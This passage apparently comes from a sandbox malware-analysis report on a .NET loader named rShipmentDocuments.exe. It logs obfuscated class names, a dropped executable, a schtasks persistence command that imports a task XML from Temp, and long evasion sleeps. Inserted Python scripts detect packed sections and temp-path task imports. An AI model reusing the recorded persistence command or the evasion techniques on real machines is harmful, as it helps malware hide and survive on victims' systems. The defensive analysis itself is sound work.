                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs  High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, tUWY54atKrJQlDpHvp.cs  High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, XVYEWIFWBiLsTMqJ21.cs  High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, Bw42dh4UebWEaNMXNVH.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, s8ssFsqinUuXVMjTPg.cs  High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, syuYZq4btbLXi0a2KwI.cs  High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, qsHtpHimvnffligSo0.cs  High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ajBCZlS1bBb6GaZcdb.cs  High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, nSJmboJMlQX1MjvRbF.cs  High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, n1RHYrzOvkNoCypqxv.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ej24U02jMkJFDYhhLB.cs  High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs  High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, EsoFSY1MObHNFvQ0yc.cs  High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, hdAVyr44GYdXRtyTuLG.cs  High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, z0u6FmON9MQ6CyDB1o.cs  High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, v2559Cskf3ytVZ5mSG.cs  High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WuxZfQxTK70JGtybAX.cs  High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
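The two measurements the Data Obfuscation section relies on, a .text section at 7.8436 bits/byte and per-class method-name lists that look like random alphanumerics, are both Shannon entropy. The script below is an added example, not Joe Sandbox code and not part of this report; it reproduces both checks so the numbers above can be reasoned about. The 7.0 section threshold and the 4.5 method-name threshold are assumptions chosen for the example (Joe Sandbox does not publish its cut-offs), the packed and plain section bodies are constructed stand-ins rather than bytes from the sample, and the method names are copied from the sfMpDDrgl5tIjHCJHi.cs and Bw42dh4UebWEaNMXNVH.cs entries above.

```python
import math
import random
from collections import Counter
from typing import Dict, Iterable, List

# Thresholds are assumptions for this example, not values taken from the report.
# Ordinary compiled .text usually sits around 6.0-6.5 bits/byte; packed or
# encrypted payloads sit above 7.0. The report measured 7.843601109745972 for
# .text in both rShipmentDocuments.exe and the dropped ZOlmYtPdlO.exe.
SECTION_ENTROPY_THRESHOLD = 7.0
NAME_ENTROPY_THRESHOLD = 4.5
REPORTED_TEXT_ENTROPY = 7.843601109745972


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_packed_section(raw_section: bytes,
                      threshold: float = SECTION_ENTROPY_THRESHOLD) -> bool:
    """True when a section's raw bytes look compressed or encrypted rather than
    like compiled code (which is what the report's .text figure indicates)."""
    return shannon_entropy(raw_section) >= threshold


def method_name_entropy(names: Iterable[str]) -> float:
    """Entropy of one class's method names concatenated, the per-type measure
    the report labels 'High entropy of concatenated method names'."""
    return shannon_entropy("".join(names).encode("utf-8"))


def has_obfuscated_names(names: Iterable[str],
                         threshold: float = NAME_ENTROPY_THRESHOLD) -> bool:
    return method_name_entropy(names) >= threshold


# Names copied from the report's sfMpDDrgl5tIjHCJHi.cs entry (renamed by the
# obfuscator) and the three TypeConverter overrides the report still shows
# for Bw42dh4UebWEaNMXNVH.cs (the compiler-visible, unrenamed ones).
OBFUSCATED: List[str] = ['vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH',
                         'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B',
                         'fkEagww8gU', 'khqaunenWt']
READABLE: List[str] = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo']


def constructed_sections() -> Dict[str, bytes]:
    """Constructed stand-ins for section bodies (no PE is parsed here): a
    seeded pseudo-random buffer models a packed section, and a repeating
    64-byte pattern models plain code/data with exactly 6.0 bits/byte."""
    rng = random.Random(1531471)  # seed is arbitrary; fixed for reproducibility
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    plain = bytes(range(64)) * 64
    return {"packed": packed, "plain": plain}


def triage() -> Dict[str, bool]:
    """Run every check once and return the verdicts."""
    sections = constructed_sections()
    return {
        "packed_section_flagged": is_packed_section(sections["packed"]),
        "plain_section_flagged": is_packed_section(sections["plain"]),
        "reported_text_flagged": REPORTED_TEXT_ENTROPY >= SECTION_ENTROPY_THRESHOLD,
        "obfuscated_names_flagged": has_obfuscated_names(OBFUSCATED),
        "readable_names_flagged": has_obfuscated_names(READABLE),
    }


if __name__ == "__main__":
    for check, verdict in triage().items():
        print(f"{check}: {verdict}")
```

On a real file, feed `is_packed_section` the raw bytes of each section from the section table rather than the whole image, as Joe Sandbox does; a high-entropy .text together with the `Assembly.Load(byte[])` call above is the usual shape of a .NET loader that decrypts and reflectively loads the next stage. Three readable names left in an otherwise renamed class (as in Bw42dh4UebWEaNMXNVH.cs) are expected: the obfuscator cannot rename overrides of framework virtuals.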

                Boot Survival

                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
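The persistence step above is what the "Scheduled temp file as task from temp location" Sigma hit in the overview refers to: the task definition is written to a .tmp file under the user's Temp directory and imported with `schtasks /Create /XML`, so the command line never names the payload. The following is an added detection example, not Joe Sandbox code and not part of this report. It works on process-creation command lines (the `CommandLine` field of a Sysmon Event ID 1 or Security 4688 record), the temp-path patterns it treats as suspicious are an assumption, and the sample command lines are constructed for the example except the first, which is the one recorded above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumed set of staging locations. A task XML imported from any of these is
# the pattern the Sigma rule describes; extend the list for your environment.
TEMP_PATH_RE = re.compile(
    r"\\AppData\\Local\\Temp\\|%TEMP%|%TMP%|\\Windows\\Temp\\", re.IGNORECASE)
# The image may be quoted ("...\schtasks.exe") or bare (schtasks).
SCHTASKS_RE = re.compile(r'schtasks(\.exe)?"?(\s|$)', re.IGNORECASE)
CREATE_RE = re.compile(r"(^|\s)/create(\s|$)", re.IGNORECASE)
# /TN and /XML values, quoted or bare.
ARG_RE = re.compile(
    r'/(?P<opt>tn|xml)\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))', re.IGNORECASE)


@dataclass
class Finding:
    task_name: Optional[str]   # value of /TN, if present
    xml_path: str              # the /XML file the task was imported from
    command_line: str


def schtasks_args(command_line: str) -> dict:
    """Collect the /TN and /XML arguments (lower-cased keys)."""
    args = {}
    for m in ARG_RE.finditer(command_line):
        value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        args[m.group("opt").lower()] = value
    return args


def check_command_line(command_line: str) -> Optional[Finding]:
    """Return a Finding when schtasks registers a task from an XML file that
    lives in a temp location; None for anything else (queries, /TR tasks,
    imports from a persistent path)."""
    if not SCHTASKS_RE.search(command_line) or not CREATE_RE.search(command_line):
        return None
    args = schtasks_args(command_line)
    xml_path = args.get("xml")
    if xml_path and TEMP_PATH_RE.search(xml_path):
        return Finding(args.get("tn"), xml_path, command_line)
    return None


def scan(command_lines: Iterable[str]) -> List[Finding]:
    return [f for f in (check_command_line(c) for c in command_lines) if f is not None]


# Constructed process-creation command lines. The first is the one the report
# recorded; the rest are invented to show what the check lets through.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"',
    r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\ProgramData\Vendor\updater-task.xml"',
    r'schtasks.exe /Create /SC DAILY /TN "Vendor\Backup" /TR "C:\Program Files\Vendor\backup.exe"',
    r'schtasks.exe /Query /TN "Updates\ZOlmYtPdlO" /XML',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(f'task "{finding.task_name}" registered from {finding.xml_path}')
```

On a hit, the task name is the pivot: the .tmp file may already be gone, but the registered definition survives under C:\Windows\System32\Tasks\<folder>\<name>, and `schtasks /Query /TN "Updates\ZOlmYtPdlO" /XML` prints it, including the Exec action. For this sample that action should resolve to the dropped C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe recorded above, which is what ties the task to the keylogger.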

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1  (8 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1  (6 occurrences)
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe    Process information set: NOOPENFILEERRORBOX    (59 identical entries)
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe    Process information set: NOOPENFILEERRORBOX    (103 identical entries)

                Malware Analysis System Evasion

                Source: Yara match    File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara match    File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe    Memory allocated: 1770000, 32D0000, 18E0000, 93B0000, A3B0000, A5B0000, B5B0000, 2A30000, 2C10000, 4C10000    memory reserve | memory write watch    (10 entries)
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe    Memory allocated: 940000, 2810000, CA0000, 8360000, 9360000, 9550000, A550000, 1730000, 3060000, 5060000    memory reserve | memory write watch    (10 entries)
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe    Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477    (4 identical entries)
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe    Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe    Thread delayed: delay time (decreasing series, 50 entries): 600000, 599805, 599687, 599578, 599469, 599359, 599250, 599140, 599024, 598906, 598796, 598687, 598578, 598468, 598359, 598250, 598126, 598000, 597890, 597781, 597669, 597533, 597387, 597275, 597154, 597047, 596937, 596828, 596718, 596609, 596500, 596390, 596281, 596172, 596062, 595953, 595843, 595734, 595625, 595515, 595406, 595297, 595187, 595068, 594953, 594844, 594734, 594624, 594515, 594406
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe    Thread delayed: delay time: 922337203685477    (2 identical entries)
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe    Thread delayed: delay time (decreasing series, 49 entries): 600000, 599890, 599779, 599672, 599562, 599453, 599292, 599175, 599054, 598836, 598719, 598607, 598500, 598390, 598281, 598171, 598062, 597953, 597843, 597734, 597624, 597515, 597406, 597296, 597187, 597078, 596968, 596859, 596740, 596609, 596500, 596390, 596280, 596172, 596062, 595953, 595844, 595719, 595609, 595500, 595390, 595281, 595172, 595062, 594952, 594843, 594734, 594625, 594496
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594221
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594073
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9098
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Window / User API: threadDelayed 5031
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Window / User API: threadDelayed 4826
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Window / User API: threadDelayed 4456
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Window / User API: threadDelayed 5387
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 7320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep count: 9520 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688	Thread sleep count: 5031 > 30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599805s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599687s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599578s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688	Thread sleep count: 4826 > 30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599469s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599359s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599250s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599140s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -599024s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598126s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597669s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597533s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597387s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597275s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597154s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -595068s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594624s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816	Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 7868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384	Thread sleep count: 4456 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384	Thread sleep count: 5387 > 30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599779s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599292s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599175s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -599054s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598836s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598607s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598171s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597624s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597296s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -597078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596740s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596280s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595953s >= -30000s
